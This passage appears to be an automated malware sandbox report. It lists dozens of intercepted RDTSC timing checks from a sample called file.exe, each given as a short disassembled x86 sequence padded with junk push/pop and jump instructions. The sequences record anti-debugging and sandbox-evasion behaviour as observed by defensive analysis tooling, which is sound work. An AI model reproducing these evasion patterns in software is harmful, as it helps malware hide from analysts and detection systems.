    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B2483 second address: 5B24A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7648CE84F3h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B24A0 second address: 5B24B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648782565h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B24B9 second address: 5B24BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B2C9D second address: 5B2CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B325B second address: 5B326E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7648CE84EDh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B326E second address: 5B3272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3272 second address: 5B3278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B34F8 second address: 5B34FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B37B7 second address: 5B37BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B37BD second address: 5B37F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f ja 00007F7648782575h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B37F1 second address: 5B37F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B8791 second address: 5B87E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7648782556h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7648782566h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F7648782560h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7648782563h 0x00000025 je 00007F7648782556h 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B87E6 second address: 5B87EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB8AE second address: 5BB8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F7648782561h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB8C6 second address: 5BB8D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7648CE84ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB9F9 second address: 5BBA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7648782556h 0x0000000a jmp 00007F7648782567h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBA1A second address: 5BBA23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBA23 second address: 5BBA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648782563h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBBC4 second address: 5BBBC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBE73 second address: 5BBE8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648782566h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBFB4 second address: 5BBFC1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4A09 second address: 5C4A0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3125 second address: 5C312B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3287 second address: 5C3291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3291 second address: 5C32B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F7648CE84F5h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32B6 second address: 5C32C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32C2 second address: 5C32C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32C8 second address: 5C32CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3417 second address: 5C341B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3765 second address: 5C3769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C413F second address: 5C416E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F7648CE84F8h 0x0000000b jmp 00007F7648CE84EEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C416E second address: 5C418B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7648782568h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8ACF second address: 5C8AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F7648CE84ECh 0x0000000b jnc 00007F7648CE84E6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8AE0 second address: 5C8AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8AE6 second address: 5C8AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8AEA second address: 5C8AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C894D second address: 5C8951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8951 second address: 5C896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F764878255Ah 0x00000011 je 00007F7648782556h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513885 second address: 513889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513889 second address: 51388F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCEA second address: 5CDCEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCEF second address: 5CDD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648782560h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007F764878255Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 jns 00007F764878255Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9E99 second address: 5D9E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9FCE second address: 5D9FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0C12 second address: 5E0C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F7648CE8503h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0C40 second address: 5E0C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0573 second address: 5E0581 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0581 second address: 5E0593 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7648782556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0593 second address: 5E0597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0597 second address: 5E05A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E05A9 second address: 5E05B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0749 second address: 5E0765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648782561h 0x00000007 push eax 0x00000008 jp 00007F7648782556h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5556 second address: 5E5564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4E55 second address: 5F4E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4FD7 second address: 5F5004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7648CE84F2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7648CE84EAh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 ja 00007F7648CE84E6h 0x0000001a pop eax 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5004 second address: 5F500A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5824 second address: 5F582E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7648CE84E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6190 second address: 5F6194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6194 second address: 5F61CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7648CE84F9h 0x0000000b pushad 0x0000000c jmp 00007F7648CE84F9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F61CF second address: 5F61DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7648782556h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7AB4 second address: 5F7AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD21D second address: 5FD221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B355 second address: 60B35F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7648CE84EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D26C second address: 61D273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D273 second address: 61D285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648CE84EAh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D285 second address: 61D298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F764878255Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50CDCA second address: 50CDDA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7648CE84E6h 0x00000008 jl 00007F7648CE84E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50CDDA second address: 50CDE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CDE4 second address: 61CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F7648CE84F4h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CE01 second address: 61CE13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jnc 00007F7648782556h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CE13 second address: 61CE33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F7648CE84E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7648CE84ECh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F7648CE84E6h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E7D5 second address: 50E7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635A0B second address: 635A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635A12 second address: 635A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636389 second address: 63638E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63638E second address: 6363A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7648782564h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6363A9 second address: 6363AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6363AD second address: 6363C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F764878255Eh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6364F1 second address: 6364F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6364F5 second address: 6364FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6364FD second address: 636505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636505 second address: 636509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636509 second address: 636518 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F7648CE84E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636518 second address: 636533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F764878255Fh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366B6 second address: 6366F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648CE84F7h 0x00000009 jmp 00007F7648CE84EBh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7648CE84F7h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366F8 second address: 636708 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7648782556h 0x00000008 ja 00007F7648782556h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6396B0 second address: 6396D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F7648CE84F8h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639905 second address: 639909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639909 second address: 639913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639913 second address: 639937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dl, CBh 0x0000000c push dword ptr [ebp+122D33E8h] 0x00000012 call 00007F7648782559h 0x00000017 pushad 0x00000018 push edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639937 second address: 63993B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63993B second address: 639955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jl 00007F7648782558h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C84A second address: 63C866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 je 00007F7648CE84E6h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F7648CE84E6h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C866 second address: 63C86C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E444 second address: 63E455 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7648CE84E6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E455 second address: 63E459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E459 second address: 63E45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E45F second address: 63E47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7648782568h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0DD7 second address: 4AE0DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0DDD second address: 4AE0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
